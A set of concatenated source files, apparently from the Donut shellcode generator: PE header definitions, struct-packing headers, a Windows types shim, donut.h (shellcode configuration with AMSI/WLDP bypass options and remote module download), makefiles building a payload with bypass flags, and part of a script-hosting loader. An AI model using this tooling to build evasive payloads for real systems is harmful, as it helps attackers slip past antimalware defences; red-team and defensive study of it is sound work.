348 | #define IMAGE_SCN_LNK_REMOVE 0x00000800 // Section contents will not become part of image. | |
349 | #define IMAGE_SCN_LNK_COMDAT 0x00001000 // Section contents comdat. | |
350 | // 0x00002000 // Reserved. | |
351 | // IMAGE_SCN_MEM_PROTECTED - Obsolete 0x00004000 | |
352 | #define IMAGE_SCN_NO_DEFER_SPEC_EXC 0x00004000 // Reset speculative exceptions handling bits in the TLB entries for this section. | |
353 | #define IMAGE_SCN_GPREL 0x00008000 // Section content can be accessed relative to GP | |
354 | #define IMAGE_SCN_MEM_FARDATA 0x00008000 | |
355 | // IMAGE_SCN_MEM_SYSHEAP - Obsolete 0x00010000 | |
356 | #define IMAGE_SCN_MEM_PURGEABLE 0x00020000 | |
357 | #define IMAGE_SCN_MEM_16BIT 0x00020000 | |
358 | #define IMAGE_SCN_MEM_LOCKED 0x00040000 | |
359 | #define IMAGE_SCN_MEM_PRELOAD 0x00080000 | |
360 | ||
361 | #define IMAGE_SCN_ALIGN_1BYTES 0x00100000 // | |
362 | #define IMAGE_SCN_ALIGN_2BYTES 0x00200000 // | |
363 | #define IMAGE_SCN_ALIGN_4BYTES 0x00300000 // | |
364 | #define IMAGE_SCN_ALIGN_8BYTES 0x00400000 // | |
365 | #define IMAGE_SCN_ALIGN_16BYTES 0x00500000 // Default alignment if no others are specified. | |
366 | #define IMAGE_SCN_ALIGN_32BYTES 0x00600000 // | |
367 | #define IMAGE_SCN_ALIGN_64BYTES 0x00700000 // | |
368 | #define IMAGE_SCN_ALIGN_128BYTES 0x00800000 // | |
369 | #define IMAGE_SCN_ALIGN_256BYTES 0x00900000 // | |
370 | #define IMAGE_SCN_ALIGN_512BYTES 0x00A00000 // | |
371 | #define IMAGE_SCN_ALIGN_1024BYTES 0x00B00000 // | |
372 | #define IMAGE_SCN_ALIGN_2048BYTES 0x00C00000 // | |
373 | #define IMAGE_SCN_ALIGN_4096BYTES 0x00D00000 // | |
374 | #define IMAGE_SCN_ALIGN_8192BYTES 0x00E00000 // | |
375 | // Unused 0x00F00000 | |
376 | #define IMAGE_SCN_ALIGN_MASK 0x00F00000 | |
377 | ||
378 | #define IMAGE_SCN_LNK_NRELOC_OVFL 0x01000000 // Section contains extended relocations. | |
379 | #define IMAGE_SCN_MEM_DISCARDABLE 0x02000000 // Section can be discarded. | |
380 | #define IMAGE_SCN_MEM_NOT_CACHED 0x04000000 // Section is not cachable. | |
381 | #define IMAGE_SCN_MEM_NOT_PAGED 0x08000000 // Section is not pageable. | |
382 | #define IMAGE_SCN_MEM_SHARED 0x10000000 // Section is shareable. | |
383 | #define IMAGE_SCN_MEM_EXECUTE 0x20000000 // Section is executable. | |
384 | #define IMAGE_SCN_MEM_READ 0x40000000 // Section is readable. | |
385 | #define IMAGE_SCN_MEM_WRITE 0x80000000 // Section is writeable. | |
386 | ||
387 | typedef struct IMAGE_COR20_HEADER | |
388 | { | |
389 | // Header versioning | |
390 | DWORD cb; | |
391 | WORD MajorRuntimeVersion; | |
392 | WORD MinorRuntimeVersion; | |
393 | ||
394 | // Symbol table and startup information | |
395 | IMAGE_DATA_DIRECTORY MetaData; | |
396 | DWORD Flags; | |
397 | ||
398 | // The main program if it is an EXE (not used if a DLL?) | |
399 | // If COMIMAGE_FLAGS_NATIVE_ENTRYPOINT is not set, EntryPointToken represents a managed entrypoint. | |
400 | // If COMIMAGE_FLAGS_NATIVE_ENTRYPOINT is set, EntryPointRVA represents an RVA to a native entrypoint | |
401 | // (deprecated for DLLs, use modules constructors instead). | |
402 | union { | |
403 | DWORD EntryPointToken; | |
404 | DWORD EntryPointRVA; | |
405 | }; | |
406 | ||
407 | // This is the blob of managed resources. Fetched using code:AssemblyNative.GetResource and | |
408 | // code:PEFile.GetResource and accessible from managed code from | |
409 | // System.Assembly.GetManifestResourceStream. The meta data has a table that maps names to offsets into | |
410 | // this blob, so logically the blob is a set of resources. | |
411 | IMAGE_DATA_DIRECTORY Resources; | |
412 | // IL assemblies can be signed with a public-private key to validate who created it. The signature goes | |
413 | // here if this feature is used. | |
414 | IMAGE_DATA_DIRECTORY StrongNameSignature; | |
415 | ||
416 | IMAGE_DATA_DIRECTORY CodeManagerTable; // Deprecated, not used | |
417 | // Used for manged codee that has unmaanaged code inside it (or exports methods as unmanaged entry points) | |
418 | IMAGE_DATA_DIRECTORY VTableFixups; | |
419 | IMAGE_DATA_DIRECTORY ExportAddressTableJumps; | |
420 | ||
421 | // null for ordinary IL images. NGEN images it points at a code:CORCOMPILE_HEADER structure | |
422 | IMAGE_DATA_DIRECTORY ManagedNativeHeader; | |
423 | ||
424 | } IMAGE_COR20_HEADER, *PIMAGE_COR20_HEADER; | |
425 | ||
426 | typedef struct _IMAGE_EXPORT_DIRECTORY { | |
427 | DWORD Characteristics; | |
428 | DWORD TimeDateStamp; | |
429 | WORD MajorVersion; | |
430 | WORD MinorVersion; | |
431 | DWORD Name; | |
432 | DWORD Base; | |
433 | DWORD NumberOfFunctions; | |
434 | DWORD NumberOfNames; | |
435 | DWORD AddressOfFunctions; // RVA from base of image | |
436 | DWORD AddressOfNames; // RVA from base of image | |
437 | DWORD AddressOfNameOrdinals; // RVA from base of image | |
438 | } IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY; | |
439 | ||
440 | #endif |
0 | /*++ | |
1 | ||
2 | Copyright (c) Microsoft Corporation. All rights reserved. | |
3 | ||
4 | Module Name: | |
5 | ||
6 | poppack.h | |
7 | ||
8 | Abstract: | |
9 | ||
10 | This file turns packing of structures off. (That is, it enables | |
11 | automatic alignment of structure fields.) An include file is needed | |
12 | because various compilers do this in different ways. | |
13 | ||
14 | poppack.h is the complement to pshpack?.h. An inclusion of poppack.h | |
15 | MUST ALWAYS be preceded by an inclusion of one of pshpack?.h, in one-to-one | |
16 | correspondence. | |
17 | ||
18 | For Microsoft compatible compilers, this file uses the pop option | |
19 | to the pack pragma so that it can restore the previous saved by the | |
20 | pshpack?.h include file. | |
21 | ||
22 | --*/ | |
23 | ||
24 | #if ! (defined(lint) || defined(RC_INVOKED)) | |
25 | #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED) | |
26 | #pragma warning(disable:4103) | |
27 | #if !(defined( MIDL_PASS )) || defined( __midl ) | |
28 | #pragma pack(pop) | |
29 | #else | |
30 | #pragma pack() | |
31 | #endif | |
32 | #else | |
33 | #pragma pack() | |
34 | #endif | |
35 | #endif /* ! (defined(lint) || defined(RC_INVOKED)) */ | |
36 |
0 | /*++ | |
1 | ||
2 | Copyright (c) Microsoft Corporation. All rights reserved. | |
3 | ||
4 | Module Name: | |
5 | ||
6 | pshpack1.h | |
7 | ||
8 | Abstract: | |
9 | ||
10 | This file turns 1 byte packing of structures on. (That is, it disables | |
11 | automatic alignment of structure fields.) An include file is needed | |
12 | because various compilers do this in different ways. For Microsoft | |
13 | compatible compilers, this files uses the push option to the pack pragma | |
14 | so that the poppack.h include file can restore the previous packing | |
15 | reliably. | |
16 | ||
17 | The file poppack.h is the complement to this file. | |
18 | ||
19 | --*/ | |
20 | ||
21 | #if ! (defined(lint) || defined(RC_INVOKED)) | |
22 | #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED) | |
23 | #pragma warning(disable:4103) | |
24 | #if !(defined( MIDL_PASS )) || defined( __midl ) | |
25 | #pragma pack(push,1) | |
26 | #else | |
27 | #pragma pack(1) | |
28 | #endif | |
29 | #else | |
30 | #pragma pack(1) | |
31 | #endif | |
32 | #endif /* ! (defined(lint) || defined(RC_INVOKED)) */ | |
33 |
0 | /*++ | |
1 | ||
2 | Copyright (c) Microsoft Corporation. All rights reserved. | |
3 | ||
4 | Module Name: | |
5 | ||
6 | pshpack2.h | |
7 | ||
8 | Abstract: | |
9 | ||
10 | This file turns 2 byte packing of structures on. (That is, it disables | |
11 | automatic alignment of structure fields.) An include file is needed | |
12 | because various compilers do this in different ways. For Microsoft | |
13 | compatible compilers, this files uses the push option to the pack pragma | |
14 | so that the poppack.h include file can restore the previous packing | |
15 | reliably. | |
16 | ||
17 | The file poppack.h is the complement to this file. | |
18 | ||
19 | --*/ | |
20 | ||
21 | #if ! (defined(lint) || defined(RC_INVOKED)) | |
22 | #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED) | |
23 | #pragma warning(disable:4103) | |
24 | #if !(defined( MIDL_PASS )) || defined( __midl ) | |
25 | #pragma pack(push,2) | |
26 | #else | |
27 | #pragma pack(2) | |
28 | #endif | |
29 | #else | |
30 | #pragma pack(2) | |
31 | #endif | |
32 | #endif /* ! (defined(lint) || defined(RC_INVOKED)) */ | |
33 |
0 | /*++ | |
1 | ||
2 | Copyright (c) Microsoft Corporation. All rights reserved. | |
3 | ||
4 | Module Name: | |
5 | ||
6 | pshpack4.h | |
7 | ||
8 | Abstract: | |
9 | ||
10 | This file turns 4 byte packing of structures on. (That is, it disables | |
11 | automatic alignment of structure fields.) An include file is needed | |
12 | because various compilers do this in different ways. For Microsoft | |
13 | compatible compilers, this files uses the push option to the pack pragma | |
14 | so that the poppack.h include file can restore the previous packing | |
15 | reliably. | |
16 | ||
17 | The file poppack.h is the complement to this file. | |
18 | ||
19 | --*/ | |
20 | ||
21 | #if ! (defined(lint) || defined(RC_INVOKED)) | |
22 | #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED) | |
23 | #pragma warning(disable:4103) | |
24 | #if !(defined( MIDL_PASS )) || defined( __midl ) | |
25 | #pragma pack(push,4) | |
26 | #else | |
27 | #pragma pack(4) | |
28 | #endif | |
29 | #else | |
30 | #pragma pack(4) | |
31 | #endif | |
32 | #endif /* ! (defined(lint) || defined(RC_INVOKED)) */ | |
33 |
0 | /*++ | |
1 | ||
2 | Copyright (c) Microsoft Corporation. All rights reserved. | |
3 | ||
4 | Module Name: | |
5 | ||
6 | pshpack8.h | |
7 | ||
8 | Abstract: | |
9 | ||
10 | This file turns 8 byte packing of structures on. (That is, it disables | |
11 | automatic alignment of structure fields.) An include file is needed | |
12 | because various compilers do this in different ways. For Microsoft | |
13 | compatible compilers, this files uses the push option to the pack pragma | |
14 | so that the poppack.h include file can restore the previous packing | |
15 | reliably. | |
16 | ||
17 | The file poppack.h is the complement to this file. | |
18 | ||
19 | --*/ | |
20 | ||
21 | #if ! (defined(lint) || defined(RC_INVOKED)) | |
22 | #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED) | |
23 | #pragma warning(disable:4103) | |
24 | #if !(defined( MIDL_PASS )) || defined( __midl ) | |
25 | #pragma pack(push,8) | |
26 | #else | |
27 | #pragma pack(8) | |
28 | #endif | |
29 | #else | |
30 | #pragma pack(8) | |
31 | #endif | |
32 | #endif /* ! (defined(lint) || defined(RC_INVOKED)) */ | |
33 |
0 | #pragma once | |
1 | #if _MSC_VER | |
2 | #define USE_WINNT | |
3 | #include <windows.h> | |
4 | #endif | |
5 | #ifndef USE_WINNT | |
6 | ||
7 | #ifndef __WIN_TYPES | |
8 | #define __WIN_TYPES__ | |
9 | ||
10 | /* | |
11 | #if _MSC_VER | |
12 | #ifndef snprintf | |
13 | #define snprintf _snprintf | |
14 | #endif | |
15 | #ifndef snscanf | |
16 | #define snscanf _snscanf | |
17 | #endif | |
18 | #endif | |
19 | */ | |
20 | ||
21 | #ifdef _MSC_VER | |
22 | #include <stdint.h> | |
23 | #else | |
24 | #include <inttypes.h> | |
25 | #endif | |
26 | ||
27 | #ifndef FALSE | |
28 | #define FALSE 0 | |
29 | #endif | |
30 | ||
31 | #ifndef TRUE | |
32 | #define TRUE 1 | |
33 | #endif | |
34 | ||
35 | #ifndef BYTE | |
36 | typedef unsigned char BYTE; | |
37 | #endif | |
38 | ||
39 | #ifndef BOOLEAN | |
40 | typedef BYTE BOOLEAN; | |
41 | #endif | |
42 | ||
43 | #ifndef BOOL | |
44 | typedef BYTE BOOL; | |
45 | #endif | |
46 | ||
47 | #ifndef WORD | |
48 | typedef uint16_t WORD; | |
49 | #endif | |
50 | ||
51 | #ifndef USHORT | |
52 | typedef uint16_t USHORT; | |
53 | #endif | |
54 | ||
55 | #ifndef DWORD | |
56 | typedef uint32_t DWORD; | |
57 | #endif | |
58 | ||
59 | #ifndef ULONG | |
60 | typedef uint32_t ULONG; | |
61 | #endif | |
62 | ||
63 | #ifndef ULONGLONG | |
64 | typedef int64_t ULONGLONG; | |
65 | #endif | |
66 | ||
67 | #ifndef ULONGULONG | |
68 | typedef uint64_t ULONGULONG; | |
69 | #endif | |
70 | ||
71 | #ifndef CHAR | |
72 | typedef char CHAR; | |
73 | #endif | |
74 | ||
75 | // wchar_t is 32-bits on Linux | |
76 | #ifndef WCHAR | |
77 | typedef uint16_t WCHAR; | |
78 | #endif | |
79 | ||
80 | // this might be a problem.. | |
81 | #ifndef ULONG_PTR | |
82 | typedef ULONGULONG *ULONG_PTR; | |
83 | #endif | |
84 | ||
85 | #ifndef VOID | |
86 | #define VOID void | |
87 | typedef char CHAR; | |
88 | typedef uint16_t SHORT; | |
89 | typedef uint32_t LONG; | |
90 | ||
91 | #if !defined(MIDL_PASS) | |
92 | typedef int INT; | |
93 | #endif | |
94 | #endif //VOID | |
95 | ||
96 | #endif // __WIN_TYPES__ | |
97 | #endif // #ifndef USE_WINNT |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef DONUT_H | |
32 | #define DONUT_H | |
33 | ||
34 | #include <stdint.h> | |
35 | #include <stdio.h> | |
36 | #include <stdlib.h> | |
37 | #include <string.h> | |
38 | #include <sys/stat.h> | |
39 | #include <inttypes.h> | |
40 | ||
41 | #define DONUT_ERROR_SUCCESS 0 | |
42 | #define DONUT_ERROR_FILE_NOT_FOUND 1 | |
43 | #define DONUT_ERROR_FILE_EMPTY 2 | |
44 | #define DONUT_ERROR_FILE_ACCESS 3 | |
45 | #define DONUT_ERROR_FILE_INVALID 4 | |
46 | #define DONUT_ERROR_NET_PARAMS 5 | |
47 | #define DONUT_ERROR_NO_MEMORY 6 | |
48 | #define DONUT_ERROR_INVALID_ARCH 7 | |
49 | #define DONUT_ERROR_INVALID_URL 8 | |
50 | #define DONUT_ERROR_URL_LENGTH 9 | |
51 | #define DONUT_ERROR_INVALID_PARAMETER 10 | |
52 | #define DONUT_ERROR_RANDOM 11 | |
53 | #define DONUT_ERROR_DLL_FUNCTION 12 | |
54 | #define DONUT_ERROR_ARCH_MISMATCH 13 | |
55 | #define DONUT_ERROR_DLL_PARAM 14 | |
56 | #define DONUT_ERROR_BYPASS_INVALID 15 | |
57 | ||
58 | // target architecture | |
59 | #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files | |
60 | #define DONUT_ARCH_X86 1 // x86 | |
61 | #define DONUT_ARCH_X64 2 // AMD64 | |
62 | #define DONUT_ARCH_X84 3 // AMD64 + x86 | |
63 | ||
64 | // module type | |
65 | #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method | |
66 | #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided | |
67 | #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional | |
68 | #define DONUT_MODULE_EXE 4 // Unmanaged EXE | |
69 | #define DONUT_MODULE_VBS 5 // VBScript | |
70 | #define DONUT_MODULE_JS 6 // JavaScript or JScript | |
71 | #define DONUT_MODULE_XSL 7 // XSL with JavaScript/JScript or VBscript embedded | |
72 | ||
73 | // instance type | |
74 | #define DONUT_INSTANCE_PIC 1 // Self-contained | |
75 | #define DONUT_INSTANCE_URL 2 // Download from remote server | |
76 | ||
77 | // AMSI/WLDP options | |
78 | #define DONUT_BYPASS_SKIP 1 // Disables bypassing AMSI/WDLP | |
79 | #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running | |
80 | #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running | |
81 | ||
82 | // apparently C# can support 2^16 or 65,536 parameters | |
83 | // we support up to eight for now :) | |
84 | #define DONUT_MAX_PARAM 8 // maximum number of parameters passed to method | |
85 | #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names | |
86 | #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance | |
87 | #define DONUT_MAX_URL 256 | |
88 | #define DONUT_MAX_MODNAME 8 | |
89 | #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok | |
90 | #define DONUT_VER_LEN 32 | |
91 | #define DONUT_DOMAIN_LEN 8 | |
92 | ||
93 | typedef struct _DONUT_CONFIG { | |
94 | int arch; // target architecture for shellcode | |
95 | int bypass; // bypass option for AMSI/WDLP | |
96 | char domain[DONUT_MAX_NAME]; // name of domain to create for assembly | |
97 | char cls[DONUT_MAX_NAME]; // name of class and optional namespace | |
98 | char method[DONUT_MAX_NAME]; // name of method to execute | |
99 | char param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon | |
100 | char file[DONUT_MAX_NAME]; // assembly to create module from | |
101 | char url[DONUT_MAX_URL]; // points to root path of where module will be on remote http server | |
102 | char runtime[DONUT_MAX_NAME]; // runtime version to use. | |
103 | char modname[DONUT_MAX_NAME]; // name of module written to disk | |
104 | ||
105 | int mod_type; // .NET EXE/DLL, VBS,JS,EXE,DLL,XSL | |
106 | uint64_t mod_len; // size of DONUT_MODULE | |
107 | void *mod; // points to donut module | |
108 | ||
109 | int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL | |
110 | uint64_t inst_len; // size of DONUT_INSTANCE | |
111 | void *inst; // points to donut instance | |
112 | ||
113 | uint64_t pic_len; // size of shellcode | |
114 | void *pic; // points to PIC/shellcode | |
115 | } DONUT_CONFIG, *PDONUT_CONFIG; | |
116 | ||
117 | #ifdef __cplusplus | |
118 | extern "C" { | |
119 | #endif | |
120 | ||
121 | int DonutCreate(PDONUT_CONFIG); | |
122 | int DonutDelete(PDONUT_CONFIG); | |
123 | ||
124 | #ifdef __cplusplus | |
125 | } | |
126 | #endif | |
127 | ||
128 | #endif |
0 | x64: | |
1 | x86_64-w64-mingw32-gcc -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib payload.c clib.c ../hash.c ../encrypt.c -I ../include -opayload.exe | |
2 | exe2h/exe2h payload.exe | |
3 | x86: | |
4 | i686-w64-mingw32-gcc -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib payload.c clib.c ../hash.c ../encrypt.c -I ../include -opayload.exe | |
5 | exe2h/exe2h payload.exe | |
6 | debug_x64: | |
7 | x86_64-w64-mingw32-gcc -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I ../include payload.c ../hash.c ../encrypt.c clib.c -opayload.exe | |
8 | debug_x86: | |
9 | i686-w64-mingw32-gcc -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I ../include payload.c ../hash.c ../encrypt.c clib.c -opayload.exe | |
10 | clean: | |
11 | rm *.o payload.exe |
0 | payload: | |
1 | cl -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c clib.c | |
2 | link -nologo -order:@order.txt -entry:ThreadProc -fixed -subsystem:console -nodefaultlib payload.obj hash.obj encrypt.obj clib.obj | |
3 | exe2h\exe2h payload.exe | |
4 | debug: | |
5 | cl -DDEBUG -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -EHa -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c clib.c | |
6 | link -nologo -order:@order.txt -subsystem:console payload.obj hash.obj encrypt.obj clib.obj | |
7 | clean: | |
8 | del *.obj payload.exe |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | // initialize virtual function table | |
32 | static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this) { | |
33 | MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this; | |
34 | ||
35 | // Initialize IUnknown | |
36 | mas->site.lpVtbl->QueryInterface = ADR(LPVOID, ActiveScript_QueryInterface); | |
37 | mas->site.lpVtbl->AddRef = ADR(LPVOID, ActiveScript_AddRef); | |
38 | mas->site.lpVtbl->Release = ADR(LPVOID, ActiveScript_Release); | |
39 | ||
40 | // Initialize IActiveScriptSite | |
41 | mas->site.lpVtbl->GetLCID = ADR(LPVOID, ActiveScript_GetLCID); | |
42 | mas->site.lpVtbl->GetItemInfo = ADR(LPVOID, ActiveScript_GetItemInfo); | |
43 | mas->site.lpVtbl->GetDocVersionString = ADR(LPVOID, ActiveScript_GetDocVersionString); | |
44 | mas->site.lpVtbl->OnScriptTerminate = ADR(LPVOID, ActiveScript_OnScriptTerminate); | |
45 | mas->site.lpVtbl->OnStateChange = ADR(LPVOID, ActiveScript_OnStateChange); | |
46 | mas->site.lpVtbl->OnScriptError = ADR(LPVOID, ActiveScript_OnScriptError); | |
47 | mas->site.lpVtbl->OnEnterScript = ADR(LPVOID, ActiveScript_OnEnterScript); | |
48 | mas->site.lpVtbl->OnLeaveScript = ADR(LPVOID, ActiveScript_OnLeaveScript); | |
49 | ||
50 | mas->site.m_cRef = 0; | |
51 | mas->inst = inst; | |
52 | } | |
53 | ||
54 | static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv) { | |
55 | MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this; | |
56 | ||
57 | DPRINT("IActiveScriptSite::QueryInterface"); | |
58 | ||
59 | if(ppv == NULL) return E_POINTER; | |
60 | ||
61 | // we implement the following interfaces | |
62 | if(IsEqualIID(&mas->inst->xIID_IUnknown, riid) || | |
63 | IsEqualIID(&mas->inst->xIID_IActiveScriptSite, riid)) | |
64 | { | |
65 | *ppv = (LPVOID)this; | |
66 | ActiveScript_AddRef(this); | |
67 | return S_OK; | |
68 | } | |
69 | *ppv = NULL; | |
70 | return E_NOINTERFACE; | |
71 | } | |
72 | ||
73 | static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this) { | |
74 | MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this; | |
75 | ||
76 | _InterlockedIncrement(&mas->site.m_cRef); | |
77 | ||
78 | DPRINT("IActiveScriptSite::AddRef : m_cRef : %i\n", mas->site.m_cRef); | |
79 | ||
80 | return mas->site.m_cRef; | |
81 | } | |
82 | ||
83 | static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this) { | |
84 | MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this; | |
85 | ||
86 | ULONG ulRefCount = _InterlockedDecrement(&mas->site.m_cRef); | |
87 | ||
88 | DPRINT("IActiveScriptSite::Release : m_cRef : %i\n", ulRefCount); | |
89 | return ulRefCount; | |
90 | } | |
91 | ||
92 | static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this, | |
93 | LPCOLESTR objectName, DWORD dwReturnMask, | |
94 | IUnknown **objPtr, ITypeInfo **ppti) | |
95 | { | |
96 | MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this; | |
97 | ||
98 | DPRINT("IActiveScriptSite::GetItemInfo"); | |
99 | ||
100 | if(dwReturnMask & SCRIPTINFO_ITYPEINFO) { | |
101 | DPRINT("Caller is requesting SCRIPTINFO_ITYPEINFO."); | |
102 | if(ppti == NULL) return E_POINTER; | |
103 | ||
104 | mas->wscript.lpTypeInfo->lpVtbl->AddRef(mas->wscript.lpTypeInfo); | |
105 | *ppti = mas->wscript.lpTypeInfo; | |
106 | } | |
107 | ||
108 | if(dwReturnMask & SCRIPTINFO_IUNKNOWN) { | |
109 | DPRINT("Caller is requesting SCRIPTINFO_IUNKNOWN."); | |
110 | if(objPtr == NULL) return E_POINTER; | |
111 | ||
112 | mas->wscript.lpVtbl->AddRef(&mas->wscript); | |
113 | *objPtr = (IUnknown*)&mas->wscript; | |
114 | } | |
115 | ||
116 | return S_OK; | |
117 | } | |
118 | ||
119 | static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this, | |
120 | IActiveScriptError *scriptError) | |
121 | { | |
122 | DPRINT("IActiveScriptSite::OnScriptError"); | |
123 | ||
124 | EXCEPINFO ei; | |
125 | DWORD dwSourceContext = 0; | |
126 | ULONG ulLineNumber = 0; | |
127 | LONG ichCharPosition = 0; | |
128 | HRESULT hr; | |
129 | ||
130 | Memset(&ei, 0, sizeof(EXCEPINFO)); | |
131 | ||
132 | DPRINT("IActiveScriptError::GetExceptionInfo"); | |
133 | hr = scriptError->lpVtbl->GetExceptionInfo(scriptError, &ei); | |
134 | if(hr == S_OK) { | |
135 | DPRINT("IActiveScriptError::GetSourcePosition"); | |
136 | hr = scriptError->lpVtbl->GetSourcePosition( | |
137 | scriptError, &dwSourceContext, | |
138 | &ulLineNumber, &ichCharPosition); | |
139 | if(hr == S_OK) { | |
140 | DPRINT("JSError: %ws line[%d:%d]\n", | |
141 | ei.bstrDescription, ulLineNumber, ichCharPosition); | |
142 | } | |
143 | } | |
144 | return S_OK; | |
145 | } | |
146 | ||
147 | static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *plcid) { | |
148 | DPRINT("IActiveScriptSite::GetLCID"); | |
149 | MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this; | |
150 | ||
151 | *plcid = mas->inst->api.GetUserDefaultLCID(); | |
152 | return S_OK; | |
153 | } | |
154 | ||
155 | static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version) { | |
156 | DPRINT("IActiveScriptSite::GetDocVersionString"); | |
157 | ||
158 | return S_OK; | |
159 | } | |
160 | ||
161 | static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this, | |
162 | const VARIANT *pvr, const EXCEPINFO *pei) | |
163 | { | |
